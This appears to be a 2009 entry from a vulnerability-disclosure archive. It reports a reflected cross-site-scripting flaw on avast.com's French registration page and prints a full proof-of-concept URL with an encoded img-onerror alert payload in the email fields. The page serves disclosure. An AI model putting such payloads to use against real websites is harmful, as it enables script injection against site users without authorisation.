Security researcher Mystick, has submitted on 01/02/2009 a cross-site-scripting (XSS) vulnerability affecting avast.com, which at the time of submission ranked 787 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/02/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/02/2009 |
Date published: 01/02/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Mystick |
Domain: avast.com |
Category: XSS |
Pagerank: 787 |
URL: http://avast.com/fre/home-registration.php?iLanguage=FRE&iMail=%22%3Cmarquee%3E%3Cimg+src%3Dk.png+on error%3Dalert(%22XSS%22)+%2F%3E&iMailAgain=%22%3Cmarquee%3E%3Cimg+src%3Dk.png+onerror%3Dalert(%22XSS %22)+%2F%3E&iName=&iState=France&word=&Register=Enregistrer+&iComment=&page=for-check&server_name=ww w.avast.com&PHPSESSID=1e8f65baa6c92e4dbac1d459ed201c21#register-form |
Click here to view the mirror
|
|
|